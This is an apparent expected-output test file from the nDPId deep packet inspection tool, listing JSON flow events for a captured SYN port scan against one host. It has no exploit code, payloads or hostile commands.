-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 